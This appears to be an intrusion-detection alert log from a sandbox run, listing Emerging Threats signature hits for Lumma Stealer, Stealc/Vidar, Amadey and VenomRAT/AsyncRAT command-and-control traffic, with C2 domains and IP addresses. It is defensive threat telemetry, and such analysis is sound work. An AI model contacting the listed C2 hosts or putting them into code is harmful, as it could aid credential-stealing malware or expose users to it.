2024-12-15T00:04:46.771543+0100	2028371	3	Unknown Traffic	192.168.2.4	50316	104.21.50.161	443	TCP
2024-12-15T00:04:48.731130+0100	2028371	3	Unknown Traffic	192.168.2.4	50318	172.67.207.38	443	TCP
2024-12-15T00:04:50.698185+0100	2028371	3	Unknown Traffic	192.168.2.4	50320	104.21.64.1	443	TCP
2024-12-15T00:04:53.919967+0100	2028371	3	Unknown Traffic	192.168.2.4	50322	104.102.49.254	443	TCP

ET MALWARE Lumma Stealer CnC Host Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-14T23:58:18.624850+0100	2054653	1	A Network Trojan was detected	192.168.2.4	49787	104.21.51.88	443	TCP
2024-12-14T23:58:20.826404+0100	2054653	1	A Network Trojan was detected	192.168.2.4	49794	104.21.22.222	443	TCP
2024-12-14T23:58:23.450936+0100	2054653	1	A Network Trojan was detected	192.168.2.4	49800	104.21.64.1	443	TCP
2024-12-14T23:58:37.802180+0100	2054653	1	A Network Trojan was detected	192.168.2.4	49842	104.21.50.161	443	TCP
2024-12-14T23:58:39.759683+0100	2054653	1	A Network Trojan was detected	192.168.2.4	49848	104.21.22.222	443	TCP
2024-12-14T23:58:41.718688+0100	2054653	1	A Network Trojan was detected	192.168.2.4	49854	104.21.64.1	443	TCP
2024-12-14T23:58:51.271988+0100	2054653	1	A Network Trojan was detected	192.168.2.4	49880	104.21.50.161	443	TCP
2024-12-14T23:58:53.194435+0100	2054653	1	A Network Trojan was detected	192.168.2.4	49896	104.21.22.222	443	TCP
2024-12-14T23:58:55.203538+0100	2054653	1	A Network Trojan was detected	192.168.2.4	49907	104.21.64.1	443	TCP
2024-12-14T23:59:22.696813+0100	2054653	1	A Network Trojan was detected	192.168.2.4	50002	104.21.79.7	443	TCP
2024-12-14T23:59:26.125062+0100	2054653	1	A Network Trojan was detected	192.168.2.4	50018	104.21.50.161	443	TCP
2024-12-14T23:59:28.066356+0100	2054653	1	A Network Trojan was detected	192.168.2.4	50026	104.21.22.222	443	TCP
2024-12-14T23:59:30.154778+0100	2054653	1	A Network Trojan was detected	192.168.2.4	50033	104.21.64.1	443	TCP
2024-12-14T23:59:40.111450+0100	2054653	1	A Network Trojan was detected	192.168.2.4	50065	104.21.51.88	443	TCP
2024-12-14T23:59:42.067466+0100	2054653	1	A Network Trojan was detected	192.168.2.4	50077	104.21.22.222	443	TCP
2024-12-14T23:59:44.304774+0100	2054653	1	A Network Trojan was detected	192.168.2.4	50094	104.21.64.1	443	TCP
2024-12-15T00:03:57.259790+0100	2054653	1	A Network Trojan was detected	192.168.2.4	50279	104.21.50.161	443	TCP
2024-12-15T00:03:59.366929+0100	2054653	1	A Network Trojan was detected	192.168.2.4	50283	172.67.207.38	443	TCP
2024-12-15T00:04:01.497046+0100	2054653	1	A Network Trojan was detected	192.168.2.4	50284	104.21.64.1	443	TCP
2024-12-15T00:04:12.738313+0100	2054653	1	A Network Trojan was detected	192.168.2.4	50295	104.21.50.161	443	TCP
2024-12-15T00:04:14.984535+0100	2054653	1	A Network Trojan was detected	192.168.2.4	50297	172.67.207.38	443	TCP
2024-12-15T00:04:16.920865+0100	2054653	1	A Network Trojan was detected	192.168.2.4	50299	104.21.64.1	443	TCP
2024-12-15T00:04:47.503677+0100	2054653	1	A Network Trojan was detected	192.168.2.4	50316	104.21.50.161	443	TCP
2024-12-15T00:04:49.467951+0100	2054653	1	A Network Trojan was detected	192.168.2.4	50318	172.67.207.38	443	TCP
2024-12-15T00:04:51.443850+0100	2054653	1	A Network Trojan was detected	192.168.2.4	50320	104.21.64.1	443	TCP

ET MALWARE Lumma Stealer Related Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-14T23:58:18.624850+0100	2049836	1	A Network Trojan was detected	192.168.2.4	49787	104.21.51.88	443	TCP
2024-12-14T23:58:20.826404+0100	2049836	1	A Network Trojan was detected	192.168.2.4	49794	104.21.22.222	443	TCP
2024-12-14T23:58:23.450936+0100	2049836	1	A Network Trojan was detected	192.168.2.4	49800	104.21.64.1	443	TCP
2024-12-14T23:58:37.802180+0100	2049836	1	A Network Trojan was detected	192.168.2.4	49842	104.21.50.161	443	TCP
2024-12-14T23:58:39.759683+0100	2049836	1	A Network Trojan was detected	192.168.2.4	49848	104.21.22.222	443	TCP
2024-12-14T23:58:41.718688+0100	2049836	1	A Network Trojan was detected	192.168.2.4	49854	104.21.64.1	443	TCP
2024-12-14T23:58:51.271988+0100	2049836	1	A Network Trojan was detected	192.168.2.4	49880	104.21.50.161	443	TCP
2024-12-14T23:58:53.194435+0100	2049836	1	A Network Trojan was detected	192.168.2.4	49896	104.21.22.222	443	TCP
2024-12-14T23:58:55.203538+0100	2049836	1	A Network Trojan was detected	192.168.2.4	49907	104.21.64.1	443	TCP
2024-12-14T23:59:22.696813+0100	2049836	1	A Network Trojan was detected	192.168.2.4	50002	104.21.79.7	443	TCP
2024-12-14T23:59:26.125062+0100	2049836	1	A Network Trojan was detected	192.168.2.4	50018	104.21.50.161	443	TCP
2024-12-14T23:59:28.066356+0100	2049836	1	A Network Trojan was detected	192.168.2.4	50026	104.21.22.222	443	TCP
2024-12-14T23:59:30.154778+0100	2049836	1	A Network Trojan was detected	192.168.2.4	50033	104.21.64.1	443	TCP
2024-12-14T23:59:40.111450+0100	2049836	1	A Network Trojan was detected	192.168.2.4	50065	104.21.51.88	443	TCP
2024-12-14T23:59:42.067466+0100	2049836	1	A Network Trojan was detected	192.168.2.4	50077	104.21.22.222	443	TCP
2024-12-14T23:59:44.304774+0100	2049836	1	A Network Trojan was detected	192.168.2.4	50094	104.21.64.1	443	TCP
2024-12-15T00:03:57.259790+0100	2049836	1	A Network Trojan was detected	192.168.2.4	50279	104.21.50.161	443	TCP
2024-12-15T00:03:59.366929+0100	2049836	1	A Network Trojan was detected	192.168.2.4	50283	172.67.207.38	443	TCP
2024-12-15T00:04:01.497046+0100	2049836	1	A Network Trojan was detected	192.168.2.4	50284	104.21.64.1	443	TCP
2024-12-15T00:04:12.738313+0100	2049836	1	A Network Trojan was detected	192.168.2.4	50295	104.21.50.161	443	TCP
2024-12-15T00:04:14.984535+0100	2049836	1	A Network Trojan was detected	192.168.2.4	50297	172.67.207.38	443	TCP
2024-12-15T00:04:16.920865+0100	2049836	1	A Network Trojan was detected	192.168.2.4	50299	104.21.64.1	443	TCP
2024-12-15T00:04:47.503677+0100	2049836	1	A Network Trojan was detected	192.168.2.4	50316	104.21.50.161	443	TCP
2024-12-15T00:04:49.467951+0100	2049836	1	A Network Trojan was detected	192.168.2.4	50318	172.67.207.38	443	TCP
2024-12-15T00:04:51.443850+0100	2049836	1	A Network Trojan was detected	192.168.2.4	50320	104.21.64.1	443	TCP

ET MALWARE Observed Malicious SSL Cert (VenomRAT)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-14T23:58:30.537205+0100	2052265	1	Domain Observed Used for C2 Detected	87.120.127.228	7777	192.168.2.4	49824	TCP

ET MALWARE Observed Win32/Lumma Stealer Related Domain (deafeninggeh .biz in TLS SNI)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-14T23:58:22.464679+0100	2058215	1	Domain Observed Used for C2 Detected	192.168.2.4	49800	104.21.64.1	443	TCP
2024-12-14T23:58:40.998120+0100	2058215	1	Domain Observed Used for C2 Detected	192.168.2.4	49854	104.21.64.1	443	TCP
2024-12-14T23:58:54.488858+0100	2058215	1	Domain Observed Used for C2 Detected	192.168.2.4	49907	104.21.64.1	443	TCP
2024-12-14T23:59:29.426005+0100	2058215	1	Domain Observed Used for C2 Detected	192.168.2.4	50033	104.21.64.1	443	TCP
2024-12-14T23:59:43.299764+0100	2058215	1	Domain Observed Used for C2 Detected	192.168.2.4	50094	104.21.64.1	443	TCP
2024-12-15T00:04:00.768298+0100	2058215	1	Domain Observed Used for C2 Detected	192.168.2.4	50284	104.21.64.1	443	TCP
2024-12-15T00:04:16.222029+0100	2058215	1	Domain Observed Used for C2 Detected	192.168.2.4	50299	104.21.64.1	443	TCP
2024-12-15T00:04:50.698185+0100	2058215	1	Domain Observed Used for C2 Detected	192.168.2.4	50320	104.21.64.1	443	TCP

ET MALWARE Observed Win32/Lumma Stealer Related Domain (immureprech .biz in TLS SNI)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-14T23:58:20.104742+0100	2058223	1	Domain Observed Used for C2 Detected	192.168.2.4	49794	104.21.22.222	443	TCP
2024-12-14T23:58:39.037384+0100	2058223	1	Domain Observed Used for C2 Detected	192.168.2.4	49848	104.21.22.222	443	TCP
2024-12-14T23:58:52.505951+0100	2058223	1	Domain Observed Used for C2 Detected	192.168.2.4	49896	104.21.22.222	443	TCP
2024-12-14T23:59:27.357508+0100	2058223	1	Domain Observed Used for C2 Detected	192.168.2.4	50026	104.21.22.222	443	TCP
2024-12-14T23:59:41.375177+0100	2058223	1	Domain Observed Used for C2 Detected	192.168.2.4	50077	104.21.22.222	443	TCP
2024-12-15T00:03:58.633662+0100	2058223	1	Domain Observed Used for C2 Detected	192.168.2.4	50283	172.67.207.38	443	TCP
2024-12-15T00:04:13.975696+0100	2058223	1	Domain Observed Used for C2 Detected	192.168.2.4	50297	172.67.207.38	443	TCP
2024-12-15T00:04:48.731130+0100	2058223	1	Domain Observed Used for C2 Detected	192.168.2.4	50318	172.67.207.38	443	TCP

ET MALWARE Observed Win32/Lumma Stealer Related Domain (tacitglibbr .biz in TLS SNI)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-14T23:58:36.725256+0100	2058231	1	Domain Observed Used for C2 Detected	192.168.2.4	49842	104.21.50.161	443	TCP
2024-12-14T23:58:50.069782+0100	2058231	1	Domain Observed Used for C2 Detected	192.168.2.4	49880	104.21.50.161	443	TCP
2024-12-14T23:59:25.413552+0100	2058231	1	Domain Observed Used for C2 Detected	192.168.2.4	50018	104.21.50.161	443	TCP
2024-12-15T00:03:56.261972+0100	2058231	1	Domain Observed Used for C2 Detected	192.168.2.4	50279	104.21.50.161	443	TCP
2024-12-15T00:04:11.990818+0100	2058231	1	Domain Observed Used for C2 Detected	192.168.2.4	50295	104.21.50.161	443	TCP
2024-12-15T00:04:46.771543+0100	2058231	1	Domain Observed Used for C2 Detected	192.168.2.4	50316	104.21.50.161	443	TCP

ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-14T23:58:17.275992+0100	2044696	1	A Network Trojan was detected	192.168.2.4	49786	185.215.113.43	80	TCP
2024-12-14T23:58:25.565495+0100	2044696	1	A Network Trojan was detected	192.168.2.4	49811	185.215.113.43	80	TCP
2024-12-14T23:58:34.649189+0100	2044696	1	A Network Trojan was detected	192.168.2.4	49835	185.215.113.43	80	TCP
2024-12-14T23:58:43.005634+0100	2044696	1	A Network Trojan was detected	192.168.2.4	49861	185.215.113.43	80	TCP
2024-12-14T23:58:50.258057+0100	2044696	1	A Network Trojan was detected	192.168.2.4	49879	185.215.113.43	80	TCP
2024-12-14T23:59:00.270580+0100	2044696	1	A Network Trojan was detected	192.168.2.4	49932	185.215.113.43	80	TCP
2024-12-14T23:59:12.699944+0100	2044696	1	A Network Trojan was detected	192.168.2.4	49976	185.215.113.43	80	TCP
2024-12-14T23:59:19.813585+0100	2044696	1	A Network Trojan was detected	192.168.2.4	49994	185.215.113.43	80	TCP
2024-12-14T23:59:26.176460+0100	2044696	1	A Network Trojan was detected	192.168.2.4	50019	185.215.113.43	80	TCP
2024-12-14T23:59:40.873328+0100	2044696	1	A Network Trojan was detected	192.168.2.4	50071	185.215.113.43	80	TCP
2024-12-15T00:03:57.255734+0100	2044696	1	A Network Trojan was detected	192.168.2.4	50281	185.215.113.43	80	TCP
2024-12-15T00:04:02.480192+0100	2044696	1	A Network Trojan was detected	192.168.2.4	50286	185.215.113.43	80	TCP
2024-12-15T00:04:07.680405+0100	2044696	1	A Network Trojan was detected	192.168.2.4	50290	185.215.113.43	80	TCP
2024-12-15T00:04:12.938884+0100	2044696	1	A Network Trojan was detected	192.168.2.4	50296	185.215.113.43	80	TCP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (awake-weaves .cyou)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-14T23:58:24.454768+0100	2058210	1	Domain Observed Used for C2 Detected	192.168.2.4	54192	1.1.1.1	53	UDP
2024-12-14T23:58:42.495272+0100	2058210	1	Domain Observed Used for C2 Detected	192.168.2.4	53913	1.1.1.1	53	UDP
2024-12-14T23:58:56.197880+0100	2058210	1	Domain Observed Used for C2 Detected	192.168.2.4	61286	1.1.1.1	53	UDP
2024-12-14T23:59:31.026293+0100	2058210	1	Domain Observed Used for C2 Detected	192.168.2.4	52538	1.1.1.1	53	UDP
2024-12-14T23:59:44.870929+0100	2058210	1	Domain Observed Used for C2 Detected	192.168.2.4	50641	1.1.1.1	53	UDP
2024-12-15T00:04:02.085051+0100	2058210	1	Domain Observed Used for C2 Detected	192.168.2.4	62332	1.1.1.1	53	UDP
2024-12-15T00:04:17.505011+0100	2058210	1	Domain Observed Used for C2 Detected	192.168.2.4	59367	1.1.1.1	53	UDP
2024-12-15T00:04:52.017342+0100	2058210	1	Domain Observed Used for C2 Detected	192.168.2.4	55200	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (covery-mover .biz)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-14T23:59:23.463564+0100	2057973	1	Domain Observed Used for C2 Detected	192.168.2.4	58458	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (dare-curbys .biz)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-14T23:59:23.606813+0100	2057975	1	Domain Observed Used for C2 Detected	192.168.2.4	62999	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (deafeninggeh .biz)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-14T23:58:20.931864+0100	2058214	1	Domain Observed Used for C2 Detected	192.168.2.4	63330	1.1.1.1	53	UDP
2024-12-15T00:03:59.392564+0100	2058214	1	Domain Observed Used for C2 Detected	192.168.2.4	62393	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (debonairnukk .xyz)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-14T23:58:24.004103+0100	2058216	1	Domain Observed Used for C2 Detected	192.168.2.4	64201	1.1.1.1	53	UDP
2024-12-14T23:58:42.212484+0100	2058216	1	Domain Observed Used for C2 Detected	192.168.2.4	55911	1.1.1.1	53	UDP
2024-12-14T23:58:55.882416+0100	2058216	1	Domain Observed Used for C2 Detected	192.168.2.4	57023	1.1.1.1	53	UDP
2024-12-14T23:59:30.744652+0100	2058216	1	Domain Observed Used for C2 Detected	192.168.2.4	64995	1.1.1.1	53	UDP
2024-12-14T23:59:44.588090+0100	2058216	1	Domain Observed Used for C2 Detected	192.168.2.4	60417	1.1.1.1	53	UDP
2024-12-15T00:04:01.794865+0100	2058216	1	Domain Observed Used for C2 Detected	192.168.2.4	51171	1.1.1.1	53	UDP
2024-12-15T00:04:17.217114+0100	2058216	1	Domain Observed Used for C2 Detected	192.168.2.4	52440	1.1.1.1	53	UDP
2024-12-15T00:04:51.732125+0100	2058216	1	Domain Observed Used for C2 Detected	192.168.2.4	54050	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (diffuculttan .xyz)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-14T23:58:23.779230+0100	2058218	1	Domain Observed Used for C2 Detected	192.168.2.4	62953	1.1.1.1	53	UDP
2024-12-14T23:58:41.937619+0100	2058218	1	Domain Observed Used for C2 Detected	192.168.2.4	63719	1.1.1.1	53	UDP
2024-12-14T23:58:55.742280+0100	2058218	1	Domain Observed Used for C2 Detected	192.168.2.4	61029	1.1.1.1	53	UDP
2024-12-14T23:59:30.604411+0100	2058218	1	Domain Observed Used for C2 Detected	192.168.2.4	49865	1.1.1.1	53	UDP
2024-12-14T23:59:44.447924+0100	2058218	1	Domain Observed Used for C2 Detected	192.168.2.4	58197	1.1.1.1	53	UDP
2024-12-15T00:04:01.651374+0100	2058218	1	Domain Observed Used for C2 Detected	192.168.2.4	54758	1.1.1.1	53	UDP
2024-12-15T00:04:17.073030+0100	2058218	1	Domain Observed Used for C2 Detected	192.168.2.4	58933	1.1.1.1	53	UDP
2024-12-15T00:04:51.593182+0100	2058218	1	Domain Observed Used for C2 Detected	192.168.2.4	58769	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (dwell-exclaim .biz)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-14T23:59:23.169594+0100	2057979	1	Domain Observed Used for C2 Detected	192.168.2.4	64519	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (effecterectz .xyz)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-14T23:58:23.524465+0100	2058220	1	Domain Observed Used for C2 Detected	192.168.2.4	58198	1.1.1.1	53	UDP
2024-12-14T23:58:41.722447+0100	2058220	1	Domain Observed Used for C2 Detected	192.168.2.4	55133	1.1.1.1	53	UDP
2024-12-14T23:58:55.205148+0100	2058220	1	Domain Observed Used for C2 Detected	192.168.2.4	61251	1.1.1.1	53	UDP
2024-12-14T23:59:30.157395+0100	2058220	1	Domain Observed Used for C2 Detected	192.168.2.4	50460	1.1.1.1	53	UDP
2024-12-14T23:59:44.306896+0100	2058220	1	Domain Observed Used for C2 Detected	192.168.2.4	62870	1.1.1.1	53	UDP
2024-12-15T00:04:01.507392+0100	2058220	1	Domain Observed Used for C2 Detected	192.168.2.4	49699	1.1.1.1	53	UDP
2024-12-15T00:04:16.928521+0100	2058220	1	Domain Observed Used for C2 Detected	192.168.2.4	53059	1.1.1.1	53	UDP
2024-12-15T00:04:51.449698+0100	2058220	1	Domain Observed Used for C2 Detected	192.168.2.4	61944	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (formy-spill .biz)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-14T23:59:23.321530+0100	2057977	1	Domain Observed Used for C2 Detected	192.168.2.4	53232	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (immureprech .biz)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-14T23:58:18.634606+0100	2058222	1	Domain Observed Used for C2 Detected	192.168.2.4	51297	1.1.1.1	53	UDP
2024-12-15T00:03:57.266580+0100	2058222	1	Domain Observed Used for C2 Detected	192.168.2.4	58616	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (impend-differ .biz)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-14T23:59:23.893350+0100	2057969	1	Domain Observed Used for C2 Detected	192.168.2.4	58663	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (print-vexer .biz)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-14T23:59:23.747550+0100	2057971	1	Domain Observed Used for C2 Detected	192.168.2.4	56333	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (se-blurry .biz)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-14T23:59:22.881975+0100	2057983	1	Domain Observed Used for C2 Detected	192.168.2.4	62039	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sordid-snaked .cyou)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-14T23:58:24.676450+0100	2058226	1	Domain Observed Used for C2 Detected	192.168.2.4	61711	1.1.1.1	53	UDP
2024-12-14T23:58:42.635456+0100	2058226	1	Domain Observed Used for C2 Detected	192.168.2.4	53689	1.1.1.1	53	UDP
2024-12-14T23:58:56.338439+0100	2058226	1	Domain Observed Used for C2 Detected	192.168.2.4	64295	1.1.1.1	53	UDP
2024-12-14T23:59:31.166029+0100	2058226	1	Domain Observed Used for C2 Detected	192.168.2.4	54318	1.1.1.1	53	UDP
2024-12-14T23:59:45.020404+0100	2058226	1	Domain Observed Used for C2 Detected	192.168.2.4	55462	1.1.1.1	53	UDP
2024-12-15T00:04:02.233334+0100	2058226	1	Domain Observed Used for C2 Detected	192.168.2.4	64149	1.1.1.1	53	UDP
2024-12-15T00:04:17.646810+0100	2058226	1	Domain Observed Used for C2 Detected	192.168.2.4	54998	1.1.1.1	53	UDP
2024-12-15T00:04:52.161087+0100	2058226	1	Domain Observed Used for C2 Detected	192.168.2.4	64162	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (tacitglibbr .biz)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-14T23:58:35.160017+0100	2058230	1	Domain Observed Used for C2 Detected	192.168.2.4	50952	1.1.1.1	53	UDP
2024-12-15T00:03:54.863552+0100	2058230	1	Domain Observed Used for C2 Detected	192.168.2.4	58162	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (wrathful-jammy .cyou)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-14T23:58:24.225217+0100	2058236	1	Domain Observed Used for C2 Detected	192.168.2.4	50054	1.1.1.1	53	UDP
2024-12-14T23:58:42.354869+0100	2058236	1	Domain Observed Used for C2 Detected	192.168.2.4	56804	1.1.1.1	53	UDP
2024-12-14T23:58:56.026105+0100	2058236	1	Domain Observed Used for C2 Detected	192.168.2.4	63919	1.1.1.1	53	UDP
2024-12-14T23:59:30.886567+0100	2058236	1	Domain Observed Used for C2 Detected	192.168.2.4	57508	1.1.1.1	53	UDP
2024-12-14T23:59:44.728146+0100	2058236	1	Domain Observed Used for C2 Detected	192.168.2.4	51137	1.1.1.1	53	UDP
2024-12-15T00:04:01.942157+0100	2058236	1	Domain Observed Used for C2 Detected	192.168.2.4	58282	1.1.1.1	53	UDP
2024-12-15T00:04:17.362205+0100	2058236	1	Domain Observed Used for C2 Detected	192.168.2.4	51277	1.1.1.1	53	UDP
2024-12-15T00:04:51.875013+0100	2058236	1	Domain Observed Used for C2 Detected	192.168.2.4	50685	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (zinc-sneark .biz)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-14T23:59:23.028866+0100	2057981	1	Domain Observed Used for C2 Detected	192.168.2.4	65489	1.1.1.1	53	UDP

ET MALWARE Win32/Stealc Active C2 Responding with browsers Config

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-14T23:58:43.947859+0100	2044245	1	Malware Command and Control Activity Detected	185.215.113.206	80	192.168.2.4	49855	TCP

ET MALWARE Win32/Stealc Requesting browsers Config from C2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-14T23:58:43.459694+0100	2044244	1	Malware Command and Control Activity Detected	192.168.2.4	49855	185.215.113.206	80	TCP

ET MALWARE Win32/Stealc Requesting plugins Config from C2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-14T23:58:44.286223+0100	2044246	1	Malware Command and Control Activity Detected	192.168.2.4	49855	185.215.113.206	80	TCP

ET MALWARE Win32/Stealc Submitting System Information to C2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-14T23:58:45.925768+0100	2044248	1	Malware Command and Control Activity Detected	192.168.2.4	49855	185.215.113.206	80	TCP

ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-14T23:58:44.423128+0100	2044247	1	Malware Command and Control Activity Detected	185.215.113.206	80	192.168.2.4	49855	TCP
2024-12-14T23:59:35.272715+0100	2044247	1	Malware Command and Control Activity Detected	116.203.12.241	443	192.168.2.4	50050	TCP

ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-14T23:59:37.574503+0100	2051831	1	Malware Command and Control Activity Detected	116.203.12.241	443	192.168.2.4	50056	TCP

ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-14T23:59:35.272275+0100	2049087	1	A Network Trojan was detected	192.168.2.4	50050	116.203.12.241	443	TCP

ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-14T23:58:43.017758+0100	2044243	1	Malware Command and Control Activity Detected	192.168.2.4	49855	185.215.113.206	80	TCP
2024-12-14T23:59:33.651144+0100	2044243	1	Malware Command and Control Activity Detected	192.168.2.4	50044	185.215.113.206	80	TCP
2024-12-14T23:59:42.855301+0100	2044243	1	Malware Command and Control Activity Detected	192.168.2.4	50084	185.215.113.206	80	TCP
2024-12-15T00:04:01.524484+0100	2044243	1	Malware Command and Control Activity Detected	192.168.2.4	50285	185.215.113.206	80	TCP
2024-12-15T00:04:21.208460+0100	2044243	1	Malware Command and Control Activity Detected	192.168.2.4	50303	185.215.113.206	80	TCP
2024-12-15T00:04:55.881241+0100	2044243	1	Malware Command and Control Activity Detected	192.168.2.4	50324	185.215.113.206	80	TCP

ETPRO JA3 Hash - Suspected ASYNCRAT Server Cert (ja3s)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-14T23:58:30.537205+0100	2842478	1	Malware Command and Control Activity Detected	87.120.127.228	7777	192.168.2.4	49824	TCP

ETPRO MALWARE Amadey CnC Activity M3

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-14T23:58:05.925422+0100	2856147	1	A Network Trojan was detected	192.168.2.4	49758	185.215.113.43	80	TCP
2024-12-15T00:03:24.669548+0100	2856147	1	A Network Trojan was detected	192.168.2.4	50264	185.215.113.43	80	TCP

ETPRO MALWARE Amadey CnC Response M1

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-14T23:58:15.922063+0100	2856122	1	A Network Trojan was detected	185.215.113.43	80	192.168.2.4	49764	TCP
2024-12-14T23:59:32.432532+0100	2856122	1	A Network Trojan was detected	185.215.113.43	80	192.168.2.4	50041	TCP
2024-12-15T00:03:52.208123+0100	2856122	1	A Network Trojan was detected	185.215.113.43	80	192.168.2.4	50277	TCP

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-14T23:58:10.385250+0100	2803305	3	Unknown Traffic	192.168.2.4	49770	31.41.244.11	80	TCP
2024-12-14T23:58:18.723154+0100	2803305	3	Unknown Traffic	192.168.2.4	49793	31.41.244.11	80	TCP
2024-12-14T23:58:27.041923+0100	2803305	3	Unknown Traffic	192.168.2.4	49813	185.215.113.16	80	TCP
2024-12-14T23:58:36.118246+0100	2803305	3	Unknown Traffic	192.168.2.4	49841	185.215.113.16	80	TCP
2024-12-14T23:58:44.470217+0100	2803305	3	Unknown Traffic	192.168.2.4	49863	185.215.113.16	80	TCP
2024-12-14T23:58:51.938607+0100	2803305	3	Unknown Traffic	192.168.2.4	49881	185.215.113.16	80	TCP
2024-12-14T23:59:01.735841+0100	2803305	3	Unknown Traffic	192.168.2.4	49938	31.41.244.11	80	TCP
2024-12-14T23:59:14.166024+0100	2803305	3	Unknown Traffic	192.168.2.4	49983	31.41.244.11	80	TCP
2024-12-14T23:59:21.269034+0100	2803305	3	Unknown Traffic	192.168.2.4	50000	31.41.244.11	80	TCP
2024-12-14T23:59:33.794701+0100	2803305	3	Unknown Traffic	192.168.2.4	50049	31.41.244.11	80	TCP

ETPRO MALWARE Common Downloader Header Pattern HCa

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-14T23:58:46.654321+0100	2803304	3	Unknown Traffic	192.168.2.4	49855	185.215.113.206	80	TCP
2024-12-14T23:59:04.349206+0100	2803304	3	Unknown Traffic	192.168.2.4	49921	185.215.113.206	80	TCP
2024-12-14T23:59:06.500296+0100	2803304	3	Unknown Traffic	192.168.2.4	49921	185.215.113.206	80	TCP
2024-12-14T23:59:08.056661+0100	2803304	3	Unknown Traffic	192.168.2.4	49921	185.215.113.206	80	TCP
